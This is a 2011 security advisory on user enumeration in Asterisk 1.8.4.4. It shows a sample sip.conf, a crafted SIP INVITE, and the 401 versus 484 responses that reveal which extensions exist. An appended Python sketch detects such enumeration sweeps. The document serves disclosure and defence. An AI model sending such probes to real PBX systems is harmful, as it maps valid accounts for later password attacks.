Asterisk 1.8.4.4: SIP responses permit username identification through use of INVITE

Author: francesco.tornieri "At" verona-wireless.net
Summary: SIP responses permit user identification
Reference: http://downloads.asterisk.org/pub/security/AST-2011-011.pdf
Release Date: 30/06/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4.4

Description:

In the latest release (1.8.4.4) the Digium developers added a patch to mitigate extension enumeration, but it is still possible to enumerate extensions through the use of a crafted INVITE method (this only works if "allowguest=yes").

Example:

PBX Asterisk:

----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=127.0.0.1
realm=asterisk
allowguest=yes          ; <----
alwaysauthreject=yes    ; <----

[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729

[500](template)
callerid=phone200<500>
username=500
secret=password

------------------------
Craft Sip INVITE example
------------------------
INVITE sip:500@127.0.0.1 SIP/2.0
CSeq: 123 INVITE
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 571579d6e5814dff04ac7cd42672738f
To:

----------------
Method: REGISTER
----------------
Valid user (user 500)
Response:
---
SIP/2.0 401 Unauthorized
---

Invalid user (user 501)
Response:
---
SIP/2.0 484 Address Incomplete
---

Francesco Tornieri
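
Added example (not part of the original advisory and not Asterisk code): a detection sketch that groups INVITE transactions by source and flags sources whose probes split into the 401 / 484 responses shown above. The event tuple layout, the thresholds and the addresses are assumptions made for illustration; the sample events are constructed, not captured traffic.

```python
import re
from collections import defaultdict

# Request and status lines in the form shown in the advisory.
REQUEST = re.compile(r"^INVITE sip:([^@;\s]+)@\S+ SIP/2\.0$")
STATUS = re.compile(r"^SIP/2\.0 (\d{3}) ")

# Constructed sample: (source IP, request line, final response status line).
SAMPLE_EVENTS = [
    ("192.0.2.10", f"INVITE sip:{ext}@127.0.0.1 SIP/2.0",
     "SIP/2.0 401 Unauthorized" if ext == 500 else "SIP/2.0 484 Address Incomplete")
    for ext in range(498, 504)
] + [
    # A phone registering and placing one call, and a single misdial.
    ("198.51.100.7", "REGISTER sip:127.0.0.1 SIP/2.0", "SIP/2.0 401 Unauthorized"),
    ("198.51.100.7", "INVITE sip:500@127.0.0.1 SIP/2.0", "SIP/2.0 401 Unauthorized"),
    ("203.0.113.5", "INVITE sip:50@127.0.0.1 SIP/2.0", "SIP/2.0 484 Address Incomplete"),
]


def find_enumeration(events, min_targets=5, min_miss_ratio=0.5):
    """Return {source: report} for sources whose INVITEs look like extension enumeration.

    A source is flagged when it sent INVITEs to at least `min_targets` distinct
    users and at least `min_miss_ratio` of those users drew a 484 (thresholds
    are hypothetical defaults, tune them to the site's normal misdial rate).
    """
    seen = defaultdict(lambda: {401: set(), 484: set()})
    for src, request_line, status_line in events:
        req = REQUEST.match(request_line.strip())
        status = STATUS.match(status_line.strip())
        if not req or not status:
            continue  # not an INVITE, or an unparseable line
        code = int(status.group(1))
        if code in (401, 484):
            seen[src][code].add(req.group(1))
    flagged = {}
    for src, by_code in seen.items():
        targets = by_code[401] | by_code[484]
        miss_ratio = len(by_code[484]) / len(targets) if targets else 0.0
        if len(targets) >= min_targets and miss_ratio >= min_miss_ratio:
            # "disclosed" lists the users whose existence the 401 gave away.
            flagged[src] = {"targets": len(targets), "miss_ratio": miss_ratio,
                            "disclosed": sorted(by_code[401])}
    return flagged


if __name__ == "__main__":
    print(find_enumeration(SAMPLE_EVENTS))
```

The "disclosed" list in each report gives the extensions whose credentials are worth reviewing after such a sweep.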